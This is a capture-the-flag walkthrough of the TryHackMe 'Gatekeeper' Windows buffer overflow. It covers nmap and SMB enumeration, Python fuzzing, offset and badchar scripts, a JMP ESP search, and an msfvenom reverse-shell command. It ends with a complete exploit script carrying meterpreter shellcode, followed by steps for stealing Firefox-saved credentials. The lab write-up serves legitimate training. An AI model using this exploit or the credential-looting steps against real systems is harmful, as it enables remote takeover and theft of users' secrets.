Gatekeeper - Buffer Overflow
Note: due to restarting of machine, you may see different IPs
1. Scanning
-sV = service version detection: for every open port it finds, it identifies which service (and version) is running on it.
-A = all information at once: running service versions, OS version, and so on.
-T4 = timing template (faster scan).
-oN or -o = writes the output to the nmap_scan file.
-v = verbose: while the scan is running you see the results line by line.
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# cat nmap_scan
# Nmap 7.80 scan initiated Fri Aug 14 04:32:54 2020 as: nmap -sV -A -T4 -oN nmap_scan -v 10.10.15.170
Nmap scan report for 10.10.5.157
Host is up (0.17s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
31337/tcp open Elite?
| fingerprint-strings:
| FourOhFourRequest:
| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
| Hello
| GenericLines:
| Hello
| Hello
| GetRequest:
| Hello GET / HTTP/1.0
| Hello
| SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Hello
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.80%I=7%D=8/14%Time=5F361409%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r
SF:rOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2eba
SF:k\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x01de
SF:fault!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!\n"
SF:);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:=N%T=80%CD=Z)
Uptime guess: 0.008 days (since Fri Aug 14 04:25:15 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:af:47:af:7a:ab (unknown)
| Names:
| GATEKEEPER<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| GATEKEEPER<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: gatekeeper
| NetBIOS computer name: GATEKEEPER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-08-14T00:35:56-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-14T04:35:56
|_ start_date: 2020-08-14T04:26:12
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 213.37 ms 10.11.0.1
2 213.71 ms 10.10.15.170
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 14 04:37:10 2020 -- 1 IP address (1 host up) scanned in 256.25 seconds
--------------
While the full scan is running, I also do a basic nmap scan that only checks for open ports.
Whenever you see ports 139 and 445 open, SMB is running, so start enumerating it to see which folders are shared.
------------------------------------------
2. Enumerate SMB shared folders
-L = list all the shared folders
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient -L 10.10.15.170
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# smbclient //10.10.15.170/Users
$ dir
$ cd Share
download gatekeeper.exe:
$ get gatekeeper.exe
$ quit
The exe is saved in the directory you ran smbclient from (your root directory); if you can't find it, search for it:
# locate gatekeeper.exe
---------------------------------------
3. Copy gatekeeper.exe to your Windows OS
Either copy and paste it directly, or start a Python web server in the directory that holds the exe and download it from the Windows machine:
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python -m SimpleHTTPServer
--------------------------------
4. Run Immunity Debugger as administrator
and open gatekeeper.exe in it, then press Play so the process runs.
Sending a little test input to the service at this point is also called spiking.
The debugger shows that 3 bytes of data have been received,
but we still don't know the exact size of the buffer (also called the offset), which is somewhere between 1 and 150 bytes. So let's find it with the help of msf.
---------------------------------------
5. Fuzzing / identification of the vulnerability
Our fuzzing script, 1_fuzzing.py:
import socket

# Strings of As of increasing length: 1 byte, then 10, 20, 30, ... in increments of 10.
counter = 10
fuzz_strings = [b"A"]
while len(fuzz_strings) <= 30:
    fuzz_strings.append(b"A" * counter)
    counter = counter + 10

for fuzz in fuzz_strings:
    print("Fuzzing with %s bytes" % len(fuzz))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.45.153', 31337))   # target IP and the port found by nmap
    s.send(fuzz + b'\r\n\r\n')
    print(s.recv(1024))                    # the service answers "Hello ..." until it crashes
    s.close()
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 1_fuzzing.py
It shows that after sending 150 bytes the fuzzing stops: the service no longer answers.
If we are not wrong, the buffer is 146 bytes plus EIP, which is 4 bytes, giving 150 bytes in total.
We have crashed the service with 150 bytes of As.
-----------------------------------
6. Finding the offset (from the beginning of the buffer up to EIP), i.e. the exact size of the buffer
First create a pattern of 150 bytes:
# msf-pattern_create -l 150
Then, after running your Python script, copy the value from EIP and look up its position in the pattern:
# msf-pattern_offset -q (value from EIP)
┌──(root💀kali)-[/home/qais/Desktop/tryhackme/gatekeeper]
└─# python 2_finding_EiP.py
import socket

# Output of msf-pattern_create -l 150 (150 bytes)
pattern = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print("\nSending evil buffer...")
    s.connect(('192.168.45.153', 31337))
    s.send(pattern + b'\r\n\r\n')
    print(s.recv(1024))
    print("\nDone!.")
except socket.error:
    print("Could not connect")
Check the application status in the debugger: it has crashed. Copy the value of EIP, which is 3956138.
This is how we create a pattern and check the exact size of the buffer.
It shows that the buffer size (the offset) is 146.
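As an added example (not part of the original write-up), the logic behind msf-pattern_create and msf-pattern_offset in plain Python, plus the little-endian packing used for the JMP ESP address in the next step. The EIP value 0x39654138 used in the demo is constructed to land at offset 146; the function names are mine.

```python
# Added example: how msf-pattern_create / msf-pattern_offset derive the offset.
# Not the write-up's own script; the EIP value is whatever the debugger shows.
import string
import struct


def pattern_create(length):
    """Cyclic pattern "Aa0Aa1Aa2...": upper, lower, digit; the digit cycles fastest."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]


def pattern_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes that ended up in EIP, or -1 if not found.

    The debugger shows EIP as a 32-bit number; x86 stores it little-endian,
    so unpacking with "<I" gives back the 4 ASCII characters in send order.
    """
    needle = struct.pack("<I", eip_value).decode("ascii", errors="replace")
    return pattern.find(needle)


def little_endian(address):
    """Pack a 32-bit address into the byte order that must go into the buffer."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    pat = pattern_create(150)                 # same as: msf-pattern_create -l 150
    print(pat)
    print(pattern_offset(pat, 0x39654138))    # constructed crash value -> 146
    print(little_endian(0x080414C3))          # JMP ESP address -> b'\xc3\x14\x04\x08'
```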
----------------------------------
7. Find JMP ESP
Find a JMP ESP instruction in a DLL or module that has no ASLR (Address Space Layout Randomization).
To see all the modules loaded by the gatekeeper application, type:
!mona modules
To find JMP ESP pointers in the gatekeeper.exe module, type:
!mona find -s "\xff\xe4" -m gatekeeper.exe
\xff is the opcode of JMP and \xe4 encodes the ESP operand. How did we know that these are the operation code (opcode) bytes of JMP ESP?
OK, so we have only two pointers in this module,
and both addresses have ASLR and SEH protection off.
Write the address in little-endian format:
080416BF = b"\xBF\x16\x04\x08"
080414C3 = b"\xC3\x14\x04\x08"
After finding the modules, click on either of the two addresses and this screen will appear. Right-click on the address --> Breakpoint --> Toggle;
you will see the address highlighted.
The purpose of setting the breakpoint is to check whether execution actually reaches that address, so that we can place our payload there.
------------------------------
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 146 bytes of padding up to EIP, then the JMP ESP address 080414C3 in little-endian
buffer = b'A' * 146 + b"\xC3\x14\x04\x08"
try:
    print("\nSending evil buffer...")
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + b'\r\n\r\n')
    print(s.recv(1024))
    print("\nDone!.")
except socket.error:
    print("Could not connect")
The breakpoint fires, so it means that we hit the address we wanted to.
-------------------------
8. Find the bad characters
Find badchars with mona.
Type the command below; it creates two files in the folder where your debugger and mona are installed:
file 1: bytearray.txt
file 2: bytearray.bin
!mona bytearray -b "\x00"
Open the bytearray.txt file, copy the byte array and paste it into your Python script.
You can also find the bad characters by googling.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Byte array from bytearray.txt: every byte except \x00, which was excluded up front
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
            b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
            b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
            b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
            b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
            b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
            b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
            b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# 146 bytes of padding, 4 bytes that land in EIP, then the byte array ends up on the stack
buffer = b"A" * 146 + b"B" * 4 + badchars
try:
    print("\nSending evil buffer...")
    s.connect(('192.168.45.153', 31337))
    s.send(buffer + b'\r\n\r\n')
    s.close()
    print("\nDone!")
except socket.error:
    print("Could not connect")
4_finding_badchars.py
Compare the bytes in memory with the file mona generated (-a is the address where the byte array starts on the stack):
!mona compare -f bytearray.bin -a 005519F8
So we find that the badchars are 00 and 0a; we must exclude them from our payload.
Finding badchars manually:
If you see any of these three things, it means that there is a badchar:
1. Break of flow, like: (1,2,5,4,3,6,7,8,9)
2. Repetition, like: (1,2,2,3,4,5,6,7,8,9)
3. Completely removed (the character is not shown at all): 1,2,3,5,6,7,8,9
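As an added example (not from the original write-up), a small check that does what "!mona compare" and the manual reading above do: it walks a dump of the bytes found on the stack next to the byte array that was sent and classifies the first disagreement as removed, repeated or a break of flow. The dumps in the demo are constructed, not real memory, and the function names are mine.

```python
# Added example: classify the first corrupted byte in a badchar comparison,
# following the three cases in the write-up. Not the page's own code.


def expected_bytes(excluded):
    """The byte array that was sent: \\x00..\\xff minus the bytes already excluded."""
    return bytes(b for b in range(256) if b not in excluded)


def classify_badchar(sent, observed):
    """Return (kind, byte) for the first byte that did not arrive as sent, or None.

    kind is "removed" (stream shifted left: the next byte shows up early),
    "repeated" (the previous byte shows up again), "corrupted" (a different
    value, i.e. a break of flow) or "truncated" (the dump ends early).
    Only the first problem is reported: everything after it is unreliable,
    so exclude that byte, resend and compare again, exactly as with mona.
    """
    for i in range(min(len(sent), len(observed))):
        if observed[i] == sent[i]:
            continue
        if i > 0 and observed[i] == sent[i - 1]:
            return ("repeated", sent[i])
        if i + 1 < len(sent) and observed[i] == sent[i + 1]:
            return ("removed", sent[i])
        return ("corrupted", sent[i])
    if len(observed) < len(sent):
        return ("truncated", sent[len(observed)])
    return None


def demo():
    """Constructed dumps reproducing the write-up's finding (\\x0a is bad)."""
    sent = expected_bytes({0x00})                  # what 4_finding_badchars.py sends
    on_stack = expected_bytes({0x00, 0x0a})        # constructed dump: \x0a was eaten
    first = classify_badchar(sent, on_stack)       # ("removed", 0x0a)
    resent = expected_bytes({0x00, 0x0a})          # exclude it and send again
    second = classify_badchar(resent, resent)      # None: the array is now clean
    return first, second


if __name__ == "__main__":
    print(demo())
```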
-----------------------------
9. Create shellcode
We pass the bad characters we found to msfvenom with -b so they are left out of the encoded payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.12.255 LPORT=443 -b "\x00\x0a" -f python --var-name shellcode
Output of msfvenom:
------------------------------
10. Open a listener in Metasploit
Run the Python script:
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.11.12.255 LPORT=443 -f py -b "\x00\x0a" --var-name shellcode
shellcode = b""
shellcode += b"\xdd\xc2\xd9\x74\x24\xf4\xbe\x7b\x43\xab\xc2"
shellcode += b"\x5a\x2b\xc9\xb1\x56\x31\x72\x18\x83\xc2\x04"
shellcode += b"\x03\x72\x6f\xa1\x5e\x3e\x67\xa7\xa1\xbf\x77"
shellcode += b"\xc8\x28\x5a\x46\xc8\x4f\x2e\xf8\xf8\x04\x62"
shellcode += b"\xf4\x73\x48\x97\x8f\xf6\x45\x98\x38\xbc\xb3"
shellcode += b"\x97\xb9\xed\x80\xb6\x39\xec\xd4\x18\x00\x3f"
shellcode += b"\x29\x58\x45\x22\xc0\x08\x1e\x28\x77\xbd\x2b"
shellcode += b"\x64\x44\x36\x67\x68\xcc\xab\x3f\x8b\xfd\x7d"
shellcode += b"\x34\xd2\xdd\x7c\x99\x6e\x54\x67\xfe\x4b\x2e"
shellcode += b"\x1c\x34\x27\xb1\xf4\x05\xc8\x1e\x39\xaa\x3b"
shellcode += b"\x5e\x7d\x0c\xa4\x15\x77\x6f\x59\x2e\x4c\x12"
shellcode += b"\x85\xbb\x57\xb4\x4e\x1b\xbc\x45\x82\xfa\x37"
shellcode += b"\x49\x6f\x88\x10\x4d\x6e\x5d\x2b\x69\xfb\x60"
shellcode += b"\xfc\xf8\xbf\x46\xd8\xa1\x64\xe6\x79\x0f\xca"
shellcode += b"\x17\x99\xf0\xb3\xbd\xd1\x1c\xa7\xcf\xbb\x48"
shellcode += b"\x04\xe2\x43\x88\x02\x75\x37\xba\x8d\x2d\xdf"
shellcode += b"\xf6\x46\xe8\x18\x8f\x41\x0b\xf6\x37\x01\xf5"
shellcode += b"\xf7\x47\x0b\x32\xa3\x17\x23\x93\xcc\xfc\xb3"
shellcode += b"\x1c\x19\x68\xbe\x8a\xa8\x67\xb2\xb5\xc5\x75"
shellcode += b"\xca\x48\xad\xf0\x2c\x1a\x81\x52\xe1\xdb\x71"
shellcode += b"\x12\x51\xb4\x9b\x9d\x8e\xa4\xa3\x74\xa7\x4f"
shellcode += b"\x4c\x20\x9f\xe7\xf5\x69\x6b\x99\xfa\xa4\x11"
shellcode += b"\x99\x71\x4c\xe5\x54\x72\x25\xf5\x81\xe5\xc5"
shellcode += b"\x05\x52\x80\xc5\x6f\x56\x02\x92\x07\x54\x73"
shellcode += b"\xd4\x87\xa7\x56\x67\xcf\x58\x27\x51\xbb\x6f"
shellcode += b"\xbd\xdd\xd3\x8f\x51\xdd\x23\xc6\x3b\xdd\x4b"
shellcode += b"\xbe\x1f\x8e\x6e\xc1\xb5\xa3\x22\x54\x36\x95"
shellcode += b"\x97\xff\x5e\x1b\xc1\xc8\xc0\xe4\x24\x4b\x06"
shellcode += b"\x1a\xba\x64\xaf\x72\x44\x35\x4f\x82\x2e\xb5"
shellcode += b"\x1f\xea\xa5\x9a\x90\xda\x46\x31\xf9\x72\xcc"
shellcode += b"\xd4\x4b\xe3\xd1\xfc\x0a\xbd\xd2\xf3\x96\x4e"
shellcode += b"\xa8\x7c\x28\xaf\x4d\x95\x4d\xb0\x4d\x99\x73"
shellcode += b"\x8d\x9b\xa0\x01\xd0\x1f\x97\x1a\x67\x3d\xbe"
shellcode += b"\xb0\x87\x11\xc0\x90"
offset = 146
address = b"\xC3\x14\x04\x08"  # JMP ESP address 080414C3 in little-endian
# padding up to EIP, the JMP ESP address, a 16-byte NOP sled, the shellcode, then some trailing bytes
payload = b"A" * offset + address + b"\x90" * 16 + shellcode + b"B" * 100
try:
    print("\nSending payload...")
    s.connect(('10.10.107.92', 31337))
    s.send(payload + b'\r\n\r\n')
    print("\nDone!.")
except socket.error:
    print("Could not connect")
5_Shellcode.py
We get a meterpreter session.
--------------------------------
11. First flag --> cat user.txt.txt
----------------------------------------------------------------
12. Privilege Escalation
Let's enumerate applications:
Enumerate Firefox.
Four files were downloaded to /root/.msf4/loot/
Downloaded files
Before renaming
--------------------------------------
13. Download the Firefox decryptor tool
https://github.com/unode/firefox_decrypt
git clone https://github.com/unode/firefox_decrypt.git